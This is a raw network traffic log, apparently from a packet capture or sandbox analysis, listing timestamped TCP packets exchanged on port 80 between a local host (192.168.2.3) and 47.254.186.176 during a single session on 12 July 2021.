Jul 12, 2021 10:29:48.972434044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972456932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972476006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972507000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972764015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972816944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972835064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972856045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972908020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972994089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973017931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973073959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973113060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973135948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973177910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973236084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973257065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973303080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973314047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973335028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973355055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973372936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973385096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973411083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973459005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973683119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973705053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973723888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973738909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973787069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.973825932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973851919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973872900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.973918915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974081993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974139929 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974189997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974212885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974231005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974250078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974280119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974296093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974308014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974339962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974358082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974380970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974395990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974416018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974440098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974461079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974490881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974498987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974565029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974669933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974689960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.974699020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.974745989 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975150108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975172997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975192070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975210905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975239038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975249052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975270033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975290060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975338936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975486994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975507021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975524902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975543022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975552082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975570917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975588083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975609064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975619078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975634098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975656033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.975696087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.975734949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976114035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976136923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976169109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976202011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976223946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976263046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976301908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976325035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976358891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976367950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976388931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976408005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976427078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976439953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976449013 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976471901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976495028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976514101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976535082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976542950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976561069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.976650953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976926088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.976974964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977077007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977097988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977140903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977164030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977185011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977202892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977226019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977247953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977327108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977364063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977405071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977494001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977514029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977531910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977550030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977569103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977586985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977727890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977747917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977792025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977798939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977843046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977863073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.977884054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.977900982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978043079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978065014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978106022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978123903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978144884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978164911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978188038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978229046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978251934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978293896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978322983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978343010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978384018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978435993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978456020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978502989 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978530884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978550911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978569031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978586912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.978595972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.978614092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979008913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979248047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979269981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979302883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979335070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979420900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979441881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979460955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979484081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979489088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979536057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979567051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979598045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979640007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979666948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979686975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979705095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979727983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979816914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979840040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979857922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979876041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.979886055 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.979908943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980014086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980036020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980092049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980233908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980254889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980273008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980298042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980314016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980324984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980344057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980365038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980386019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980391979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980410099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980428934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980437040 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980458021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980477095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980494976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980501890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980520964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980530024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980551004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.980560064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.980581999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981002092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981057882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981081963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981101036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981120110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981138945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981146097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981163979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981175900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981199026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981220961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981240034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981250048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981268883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981277943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981295109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981313944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981334925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981339931 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981358051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981365919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.981384039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.981394053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982063055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982085943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982105017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982122898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982141018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982156992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982181072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982193947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982213974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982235909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982259035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982347965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982371092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982389927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982398987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982417107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982435942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982455969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982465982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982482910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982496023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982647896 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.982949972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982973099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.982990980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983022928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.983184099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983206034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983223915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983234882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.983253956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983273029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983282089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.983300924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983318090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983330011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.983345985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983366013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983376980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.983392000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.983412027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989197016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989223957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989240885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989258051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989274025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989293098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989306927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989320040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989327908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989345074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989379883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989394903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989423990 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989443064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989449978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989509106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989526987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989542961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989567995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989597082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989712000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989729881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989772081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989833117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989851952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.989893913 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.989957094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990010023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990029097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990044117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990051985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990078926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990140915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990276098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990295887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990344048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990351915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990370035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990387917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990401030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990412951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990438938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990478992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990520000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990528107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990545988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990583897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.990637064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990931988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.990983963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991029024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991048098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991096020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991126060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991151094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991168976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991209984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991364002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991381884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991425037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991451979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991468906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991488934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991498947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991530895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991609097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991628885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991645098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.991691113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.991719007 CEST	80	49755	47.254.186.176	192.168.2.3
